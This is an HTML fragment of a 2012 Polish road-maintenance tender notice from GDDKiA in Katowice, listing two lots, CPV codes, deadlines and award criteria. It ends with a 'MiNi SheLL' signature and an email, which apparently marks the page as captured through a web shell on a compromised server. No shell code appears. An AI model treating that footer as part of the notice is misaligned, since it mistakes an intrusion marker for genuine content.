<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczlane zmiany Umowy oraz warunki zmian zostały określone w Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gddkia.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GDDKiA Oddział w Katowicach ul. Myśliwska 5, 40-017 Katowice, pok. 303. lub na stronie internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 08:45, miejsce: GDDKiA Oddział w Katowicach ul. Myśliwska 5, 40-017 Katowice, Wydział Zamówień Publicznych pok. 303.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. 2. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów, złożonych na potwierdzenie spełnienia warunków udziału w postępowaniu, na zasadzie spełnia - nie spełnia. 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast spełnianie warunków wskazanych w art. 22 ust 1 ustawy Pzp i których opis sposobu dokonania oceny spełniania został zamieszczony w Sekcji III.3 ogłoszenia, Wykonawcy wykazują łącznie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowe utrzymanie korpusu drogowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1:	obejmująca KOMPLEKSOWE UTRZYMANIE KORPUSU DROGOWEGO
Grupa robót nr 1 : 	NAWIERZCHNIA DRÓG KRAJOWYCH
Grupa robót nr 2 : 	POBOCZA
Grupa robót nr 3 : 	ODWODNIENIE
Grupa robót nr 4 : 	CHODNIKI, ŚCIEŻKI ROWEROWE
Grupa robót  nr 11 : 	POZOSTAŁE WYDATKI ZWIĄZANE Z UTRZYMANIEM SIECI DRÓG KRAJOWYCH - CAŁODOBOWY PATROL UTRZYMANIA AUTOSTRADY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.30.00-9, 45.23.31.42-6, 45.23.31.39-3, 45.23.32.23-8, 45.23.32.22-1, 45.23.32.90-8, 45.23.32.80-5, 50.23.00.00-6, 50.23.30.00-0, 90.00.00.00-7, 90.51.10.00-2, 45.23.34.00-6, 45.11.12.00-0, 45.11.21.00-6, 45.11.22.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oznakowanie i bezpieczeństwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2:	obejmująca OZNAKOWANIE I BEZPIECZEŃSTWO
Grupa robót nr 5 : 	OZNAKOWANIE
Grupa robót nr 6 : 	BEZPIECZEŃSTWO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.30.00-9, 45.23.31.42-6, 45.23.31.39-3, 45.23.32.23-8, 45.23.32.22-1, 45.23.32.90-8, 45.23.32.80-5, 50.23.00.00-6, 50.23.30.00-0, 90.00.00.00-7, 90.51.10.00-2, 45.11.12.00-0, 45.11.21.00-6, 45.11.22.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com